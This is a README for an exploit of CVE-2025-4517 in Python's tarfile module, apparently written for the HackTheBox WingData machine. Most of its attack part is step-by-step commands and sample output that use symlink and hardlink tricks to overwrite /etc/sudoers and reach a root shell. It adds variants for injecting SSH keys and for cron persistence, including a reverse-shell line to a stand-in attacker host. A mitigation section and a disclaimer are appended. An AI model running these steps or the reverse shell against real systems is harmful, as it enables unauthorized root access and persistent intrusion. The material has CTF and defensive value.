## https://sploitus.com/exploit?id=0ED7DA4A-BFF9-589D-BA60-551E86D2BC2C
# CVE-2025-4517 Exploit - WingData HTB
## Overview
This exploit leverages **CVE-2025-4517**, a critical vulnerability in Python's `tarfile` module that allows arbitrary file write through a combination of symlink path traversal and hardlink manipulation. This bypasses the `filter="data"` protection introduced in Python 3.12.
### Vulnerability Details
- **CVE ID**: CVE-2025-4517
- **Affected Versions**: Python 3.8.0 through 3.13.1
- **CVSS Score**: 9.3 (Critical)
- **Impact**: Arbitrary file write with elevated privileges
## Technical Background
The vulnerability exploits a flaw in how Python's `tarfile.extractall()` handles the interaction between:
1. **Symlinks** - Used to create path traversal outside the extraction directory
2. **Hardlinks** - Used to reference files through the escaped symlink path
3. **Filter Bypass** - The `filter="data"` parameter blocks direct symlink escapes, but the hardlink technique circumvents this protection
### Attack Flow
```
1. Create deep nested directories (path confusion)
โโ Uses 247-character directory names repeated 16 levels deep
2. Build symlink chain for traversal
โโ Creates symlinks that resolve upward through directory tree
3. Escape symlink to target directory (/etc)
โโ Final symlink points outside extraction boundary
4. Create hardlink pointing through escape symlink
โโ Hardlink: "sudoers_link" โ "escape/sudoers" โ "/etc/sudoers"
5. Write content to hardlink
โโ Writing to "sudoers_link" actually writes to /etc/sudoers
```
## Target System: WingData HTB
### Vulnerable Component
**Script**: `/opt/backup_clients/restore_backup_clients.py`
```python
# Vulnerable code snippet
with tarfile.open(backup_path, "r") as tar:
tar.extractall(path=staging_dir, filter="data")
```
**Sudo Permissions**:
```
wacky ALL=(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
```
### System Details
- **OS**: Debian 12 (Bookworm)
- **Python Version**: 3.12.3 (Vulnerable to CVE-2025-4517)
- **Kernel**: 6.1.0-42-amd64
## Usage
### Prerequisites
- User access with sudo permissions for the vulnerable script
- Write access to `/opt/backup_clients/backups/`
- Python 3 on attacking machine
### Installation
```bash
# Download the exploit
wget https://raw.githubusercontent.com/yourusername/cve-2025-4517-wingdata/main/exploit.py
# Make executable
chmod +x exploit.py
```
### Basic Execution
```bash
# Run the exploit
./exploit.py
# Or with Python
python3 exploit.py
```
### Manual Step-by-Step
If you prefer to run each step manually:
```bash
# 1. Create the exploit tar
python3 exploit.py --create-only
# 2. Deploy to target
cp /tmp/cve_2025_4517_exploit.tar /opt/backup_clients/backups/backup_9999.tar
# 3. Execute via vulnerable script
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py \
-b backup_9999.tar \
-r restore_exploit
# 4. Verify sudoers modification
sudo cat /etc/sudoers | grep "$(whoami)"
# 5. Get root
sudo /bin/bash
```
## Output Example
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-4517 Tarfile Exploit - WingData HTB โ
โ Privilege Escalation via Symlink + Hardlink Bypass โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target user: wacky
[*] Creating exploit tar for user: wacky
[*] Phase 1: Building nested directory structure...
[*] Phase 2: Creating symlink chain for path traversal...
[*] Phase 3: Creating escape symlink to /etc...
[*] Phase 4: Creating hardlink to /etc/sudoers...
[*] Phase 5: Writing sudoers entry...
[+] Exploit tar created: /tmp/cve_2025_4517_exploit.tar
[*] Deploying exploit to: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit deployed successfully
[*] Triggering extraction via vulnerable script...
[+] Backup: backup_9999.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Extraction completed
[*] Verifying exploit success...
[+] SUCCESS! User 'wacky' added to sudoers
[+] Entry: wacky ALL=(ALL) NOPASSWD: ALL
============================================================
[+] EXPLOITATION SUCCESSFUL!
[+] User 'wacky' now has full sudo privileges
[+] Get root with: sudo /bin/bash
============================================================
[?] Spawn root shell now? (y/n): y
[*] Spawning root shell...
[*] Run: sudo /bin/bash
root@wingdata:/tmp# whoami
root
root@wingdata:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
```
## Proof of Concept Flow
### Stage 1: Initial Access
- Exploit Wing FTP Server (CVE-2020-9470 or credential stuffing)
- Gain shell as `wingftp` or crack user credentials
- Escalate to `wacky` user via password reuse
### Stage 2: Privilege Escalation (This Exploit)
- Identify sudo permissions on backup restore script
- Recognize Python version vulnerable to CVE-2025-4517
- Deploy tar exploit to modify `/etc/sudoers`
- Gain root access
## Mitigation
### For Python Developers
1. **Upgrade Python**: Update to Python 3.13.2+ or apply security patches
```bash
python3 --version # Check version
```
2. **Additional Validation**: Implement strict validation on tar contents
```python
# Check for suspicious members before extraction
for member in tar.getmembers():
if member.islnk() or member.issym():
raise SecurityError("Symlinks/hardlinks not allowed")
```
3. **Restrict Extraction Paths**: Verify all extracted files stay within bounds
```python
import os
for member in tar.getmembers():
member_path = os.path.join(extract_path, member.name)
if not member_path.startswith(os.path.abspath(extract_path)):
raise SecurityError("Path traversal detected")
```
### For System Administrators
1. **Limit sudo Access**: Minimize scripts that can be run as root
```bash
# Remove or restrict backup script sudo access
visudo
```
2. **Input Validation**: Validate tar archives before processing
```bash
# Check tar contents before extraction
tar -tzf archive.tar | grep -E '\.\./|^/'
```
3. **File Integrity Monitoring**: Monitor critical files like `/etc/sudoers`
```bash
# Setup AIDE or similar IDS
aide --check
```
4. **AppArmor/SELinux**: Implement mandatory access controls
## References
### CVE Information
- [CVE-2025-4517 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-4517)
- [CVE-2025-4138 - Related Vulnerability](https://nvd.nist.gov/vuln/detail/CVE-2025-4138)
- [Python Security Advisory](https://www.python.org/downloads/release/python-3132/)
### Research & Write-ups
- [Linux Security Advisory](https://linuxsecurity.com/news/security-vulnerabilities/python-tarfile-supply-chain-risk)
- [Google Security Research - GHSA-hgqp-3mmf-7h8f](https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f)
### Public PoCs
- [DesertDemons CVE-2025-4138-4517-POC](https://github.com/DesertDemons/CVE-2025-4138-4517-POC)
- [StealthByte CVE-2025-4517-poc](https://github.com/StealthByte0/CVE-2025-4517-poc)
- [AnimePrincess420 PoC](https://github.com/AnimePrincess420/CVE-2025-4517-PoC)
### HackTheBox
- [WingData Machine](https://app.hackthebox.com/machines/WingData)
## Variants
### SSH Key Injection
Instead of modifying `/etc/sudoers`, you can inject SSH keys into `/root/.ssh/authorized_keys`:
```python
# Modify Phase 3 to point to /root
e.linkname = linkpath + "/../../../../../../../root"
# Add .ssh directory creation
ssh_dir = tarfile.TarInfo("escape/.ssh")
ssh_dir.type = tarfile.DIRTYPE
tar.addfile(ssh_dir)
# Hardlink to authorized_keys
f.linkname = "escape/.ssh/authorized_keys"
# Write SSH public key content
# (requires pre-generating SSH key pair)
```
### Cron Job Injection
Write to `/etc/cron.d/` for persistence:
```python
# Point to /etc
e.linkname = linkpath + "/../../../../../../../etc"
# Hardlink to cron job
f.linkname = "escape/cron.d/rootjob"
# Write cron content
content = b"* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'\n"
```
## Troubleshooting
### Common Issues
**Issue**: `[!] Error during extraction: "linkname 'escape/sudoers' not found"`
**Solution**: The target file must exist. `/etc/sudoers` always exists, but if targeting other files, ensure they exist first or create them in a prior extraction.
---
**Issue**: `cp: not writing through dangling symlink`
**Solution**: Remove the dangling symlink first:
```bash
rm /opt/backup_clients/backups/backup_9999.tar
```
---
**Issue**: Exploit succeeds but can't sudo
**Solution**: Check sudoers syntax:
```bash
sudo visudo -c
```
If syntax is invalid, the file won't be processed.
## Legal Disclaimer
This exploit is provided for **educational purposes only** and is intended for use in:
- Authorized penetration testing engagements
- Capture The Flag (CTF) competitions like HackTheBox
- Security research in controlled environments
- Vulnerability disclosure and patch development
**DO NOT** use this exploit against systems you do not own or have explicit written permission to test. Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - United States
- Computer Misuse Act - United Kingdom
- Similar legislation in other jurisdictions
The author(s) assume no liability for misuse of this code.
## Author
**Original Research**: Multiple security researchers (see References)
**HTB Implementation**: Community contributors
**This Exploit**: Adapted for WingData HTB machine
## Contributing
Found a bug or improvement? Feel free to:
1. Fork the repository
2. Create a feature branch
3. Submit a pull request
## License
MIT License - See LICENSE file for details
---
**Last Updated**: February 2026
**Status**: โ Working on HackTheBox WingData machine
**Difficulty**: Medium โ Root via CVE-2025-4517